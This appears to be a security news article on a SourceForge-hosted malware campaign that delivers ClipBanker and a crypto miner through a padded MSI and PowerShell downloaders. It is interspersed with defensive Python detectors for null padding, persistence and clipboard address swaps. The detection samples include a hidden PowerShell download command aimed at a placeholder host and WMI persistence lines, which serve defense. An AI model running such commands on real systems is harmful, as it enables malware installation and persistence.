A recent malware distribution scheme has been uncovered on SourceForge, the popular software hosting and distribution platform.
Cybercriminals have leveraged SourceForge’s subdomain feature to deceive users with fake downloads of software applications, embedding malicious files into the infection chain.
This attack, primarily targeting Russian-speaking users, has raised alarms within the cybersecurity community for its level of complexity and persistence techniques.
Exploitation of SourceForge Domains
The campaign starts with a seemingly legitimate software project called “officepackage” hosted on SourceForge.net.

The description and files of “officepackage” appear genuine, mimicking Microsoft Office add-ins from GitHub.
What makes this operation unique is the attackers’ exploitation of SourceForge’s feature that generates subdomains (e.g., officepackage.sourceforge[.]io) for hosted projects.
These subdomains are well-indexed by search engines, lending credibility to malicious pages created by the attackers.
On the officepackage.sourceforge[.]io domain, visitors are presented with an enticing list of office applications accompanied by “Download” buttons.
Hovering over these buttons reveals misleading URLs, such as loading.sourceforge[.]io/download.
Clicking these buttons initiates a multi-step malware infection chain, leading users to download a suspicious 7MB archive named “vinstaller.zip.”
The Infection Process
Inside “vinstaller.zip” lies a password-protected archive (“installer.zip”) and a text file disclosing the password.

Once extracted, the archive contains an oversized Windows Installer file named “installer.msi,” inflated with null bytes to falsely appear legitimate.
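The null-byte inflation described above leaves a simple statistical fingerprint: most of the file is zeros, and those zeros sit in one long run rather than being spread through the content. The following triage script, added here as an example and not taken from the article or any vendor tool, measures that fingerprint on arbitrary file content. The thresholds, the sample "installer" bytes and the script name are assumptions chosen for illustration.

```python
"""Heuristic check for files inflated with null-byte padding.

Added example, not code from the original article: it flags a file when most
of its bytes are 0x00 and those zeros form one very long run, which is how
the article describes installer.msi being bulked up. Thresholds are
assumptions picked for illustration.
"""
from __future__ import annotations

import re
import sys

NULL_RATIO_THRESHOLD = 0.80          # assumption: flag when >= 80% of bytes are 0x00
MIN_NULL_RUN_BYTES = 1024 * 1024     # assumption: ... and the longest zero run is >= 1 MiB
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # MSI packages are OLE2 compound documents


def null_byte_stats(data: bytes) -> tuple[float, int]:
    """Return (fraction of 0x00 bytes, length of the longest contiguous 0x00 run)."""
    if not data:
        return 0.0, 0
    ratio = data.count(0) / len(data)
    longest = max((m.end() - m.start() for m in re.finditer(rb"\x00+", data)), default=0)
    return ratio, longest


def looks_like_ole_compound(data: bytes) -> bool:
    """True when the content starts with the OLE2 header a genuine MSI carries."""
    return data.startswith(OLE_MAGIC)


def is_null_padded(data: bytes, ratio_threshold: float = NULL_RATIO_THRESHOLD,
                   min_run: int = MIN_NULL_RUN_BYTES) -> bool:
    """Decide whether the content is mostly one large block of zeros."""
    ratio, longest = null_byte_stats(data)
    return ratio >= ratio_threshold and longest >= min_run


def report(data: bytes) -> dict:
    """Summarise the checks for one file's content."""
    ratio, longest = null_byte_stats(data)
    return {
        "size": len(data),
        "null_ratio": round(ratio, 4),
        "longest_null_run": longest,
        "ole_header": looks_like_ole_compound(data),
        "suspicious": is_null_padded(data),
    }


# Constructed samples: a fake "MSI" with 16 KiB of content followed by 2 MiB of zeros,
# and the same content without the padding.
_CONTENT = bytes(range(256)) * 64
SAMPLE_PADDED = OLE_MAGIC + _CONTENT + b"\x00" * (2 * 1024 * 1024)
SAMPLE_NORMAL = OLE_MAGIC + _CONTENT

if __name__ == "__main__":
    # Usage: python null_padding_check.py <file>   (no argument: run on the constructed samples)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(report(fh.read()))
    else:
        for name, blob in (("padded", SAMPLE_PADDED), ("normal", SAMPLE_NORMAL)):
            print(name, report(blob))
```

Genuine installers can legitimately contain zero-filled sectors, so treat a hit as a triage signal to be confirmed against the vendor's published package size and hash rather than as a verdict on its own.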
Executing this installer triggers various activities, including the creation of several files, the execution of embedded scripts, and communication with external servers.
A Visual Basic (VB) script embedded in the installer plays a crucial role, using PowerShell to download and execute a batch file named “confvk” from GitHub.
This batch file works as an intermediary, unpacking additional malware components, running scripts, and paving the way for advanced persistence mechanisms.
Notably, the payload includes two PowerShell scripts: one that extracts system information and sends it to a Telegram server, and another that downloads a subsequent batch file, “confvz,” orchestrating further infection steps.
The attackers have employed multiple persistence methods to secure access to compromised systems.
These include the creation of Windows services (e.g., NetworkConfiguration, PerformanceMonitor), registry modifications, and the use of the WMIC tool to establish event filters for recurrent malware execution.
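The staging and persistence steps described in the two paragraphs above (a script inside the installer launching a PowerShell downloader, service creation, and WMI event subscriptions set up through WMIC) each leave a distinct process-creation trace. The rules below, written here as an added example and not taken from the article or any product, run over a few constructed Sysmon-style events and name the rule each one trips. Field names, file paths, the placeholder URL and the sample command lines are assumptions for illustration; the two service names are the ones the article lists.

```python
"""Detection rules for the staging and persistence behaviour described above.

Added example, not from the article or any vendor product. It runs three
rules over constructed process-creation events (Sysmon-style fields,
simplified): WMI event-subscription persistence set up through wmic.exe,
creation of the service names the article lists, and a script host or
installer engine spawning a PowerShell downloader. Field names, sample
command lines and the URL are assumptions made for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str         # executable that started
    parent_image: str  # executable that started it
    command_line: str


# Service names taken from the article; a real watchlist would be broader.
SUSPICIOUS_SERVICE_NAMES = {"networkconfiguration", "performancemonitor"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "msiexec.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "start-bitstransfer", "net.webclient")
WMI_SUBSCRIPTION_RE = re.compile(r"__eventfilter|commandlineeventconsumer|__filtertoconsumerbinding")
SC_CREATE_RE = re.compile(r"\bcreate\s+\"?([^\s\"]+)")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(event: ProcessEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits: list[str] = []
    image, parent = _basename(event.image), _basename(event.parent_image)
    cmd = event.command_line.lower()

    # Rule 1: wmic.exe touching the WMI subscription classes used for persistence.
    if image == "wmic.exe" and WMI_SUBSCRIPTION_RE.search(cmd):
        hits.append("wmi_event_subscription_via_wmic")

    # Rule 2: sc.exe creating a service whose name is on the watchlist.
    if image == "sc.exe":
        m = SC_CREATE_RE.search(cmd)
        if m and m.group(1) in SUSPICIOUS_SERVICE_NAMES:
            hits.append("watchlisted_service_created")

    # Rule 3: a script host or the installer engine launching PowerShell with download cmdlets.
    if (image in {"powershell.exe", "pwsh.exe"} and parent in SCRIPT_HOSTS
            and any(marker in cmd for marker in DOWNLOAD_MARKERS)):
        hits.append("script_host_spawned_powershell_downloader")
    return hits


def scan(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event index -> matched rules, keeping only events that matched something."""
    findings: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            findings[i] = hits
    return findings


# Constructed events; paths, names and the URL are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wscript.exe",
                 'powershell.exe -w hidden -c "iwr https://example.invalid/confvk -OutFile $env:TEMP\\confvk"'),
    ProcessEvent(r"C:\Windows\System32\sc.exe", r"C:\Windows\System32\cmd.exe",
                 'sc.exe create NetworkConfiguration binPath= "C:\\ProgramData\\example\\svc.exe"'),
    ProcessEvent(r"C:\Windows\System32\wbem\wmic.exe", r"C:\Windows\System32\cmd.exe",
                 'wmic.exe /namespace:"\\\\root\\subscription" path __EventFilter create Name="PerformanceMonitor" ...'),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
                 "svchost.exe -k netsvcs -p"),
    ProcessEvent(r"C:\Windows\System32\sc.exe", r"C:\Windows\System32\cmd.exe",
                 "sc.exe query wuauserv"),
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line[:60], "->", rules)
```

Rule 1 also fires on legitimate administration that uses WMI subscriptions, and rule 3 on installers that genuinely fetch components, so in practice these are hunting queries to review rather than blocking rules; the benign svchost and "sc query" events are included to show they pass through untouched.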
The confvz batch file organizes malware components into subdirectories and executes AutoIt scripts contained within DLLs, facilitating the deployment of sophisticated malware types.
According to the report, two notable payloads, ClipBanker and a cryptocurrency mining module, are injected into the system.
ClipBanker manipulates clipboard data to replace cryptocurrency wallet addresses, redirecting funds to attackers’ wallets.
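From the defender's side, the clipboard substitution described above shows up as a wallet-looking string being replaced by a different wallet-looking string without any copy action from the user. The following heuristic, added here as an example and not taken from the article, runs over a constructed stream of clipboard snapshots and flags exactly that transition. It assumes a host agent that can report, for each clipboard change, a timestamp, the new text and whether the user triggered the change; the address patterns, sample addresses and the agent interface are all assumptions for illustration.

```python
"""Heuristic detector for clipboard wallet-address substitution.

Added example, not from the article: it models the ClipBanker behaviour the
article describes from the defender's side. A host agent is assumed to emit
clipboard snapshots with a timestamp, the new text, and whether the change
was user-driven (a copy keystroke or menu action); that last flag is an
assumption about what the agent can observe. A snapshot that replaces one
wallet-looking address with a different one without a user action is flagged.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Loose address shapes, enough to say "this looks like a wallet address" for the demo.
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


@dataclass(frozen=True)
class Snapshot:
    t: float              # seconds since agent start
    text: str             # clipboard text after the change
    user_initiated: bool  # True if the agent saw the user trigger the copy


def address_kind(text: str) -> str | None:
    """Return which address pattern the text matches, or None."""
    s = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return kind
    return None


def detect_swaps(snapshots: list[Snapshot]) -> list[dict]:
    """Flag consecutive snapshots where an address silently becomes a different address."""
    alerts = []
    for prev, cur in zip(snapshots, snapshots[1:]):
        before, after = address_kind(prev.text), address_kind(cur.text)
        if before and after and prev.text.strip() != cur.text.strip() and not cur.user_initiated:
            alerts.append({
                "t": cur.t,
                "kind": after,
                "original": prev.text.strip(),
                "replacement": cur.text.strip(),
                "delay_s": round(cur.t - prev.t, 3),
            })
    return alerts


# Constructed addresses: syntactically plausible, not real wallets.
BTC_ORIGINAL = "bc1qconstructedexampleaddress0000000001"
BTC_SWAPPED = "bc1qconstructedexampleaddress0000000002"
ETH_A = "0x0123456789abcdef0123456789abcdef01234567"
ETH_B = "0x76543210fedcba9876543210fedcba9876543210"

SAMPLE_SNAPSHOTS = [
    Snapshot(10.0, BTC_ORIGINAL, True),    # user copies an address to paste into a wallet app
    Snapshot(10.2, BTC_SWAPPED, False),    # clipboard changes with no user action: suspicious
    Snapshot(42.0, "meeting notes", True),
    Snapshot(60.0, ETH_A, True),
    Snapshot(75.0, ETH_B, True),           # user copied a second address themselves: benign
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_SNAPSHOTS):
        print(alert)
```

Legitimate software (password managers, clipboard history tools) also rewrites the clipboard, so a deployed version should attribute the change to the writing process and alert only when that process is not an expected one; the constructed benign snapshots show the detector staying quiet when the user performs the second copy.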
Additional measures, such as leveraging debugging tools and exploiting OS installation scripts, further demonstrate the attackers’ ingenuity in ensuring their malware remains active.
Telemetry data indicates that 90% of the victims are located in Russia, reflecting a strong focus on Russian-speaking users.
Between January and March 2025, over 4,600 users encountered the scheme.
While the primary aim appears to be cryptocurrency theft, the attackers may also sell access to infected systems to other threat actors.
This campaign underscores the dangers of downloading software from unofficial sources. Users are advised to obtain software exclusively from trusted platforms and vendors.
SourceForge, while a reputable hosting platform, has unintentionally become a vector for malware distribution due to its subdomain creation feature.
Organizations must enhance their defenses against increasingly sophisticated threats like this.
Antivirus solutions, network filtering, and employee training on phishing and malware avoidance are critical measures to mitigate risks.
As attackers continue to refine their methods, vigilance and preventive cybersecurity practices are essential to safeguard both individuals and enterprises from such malicious campaigns.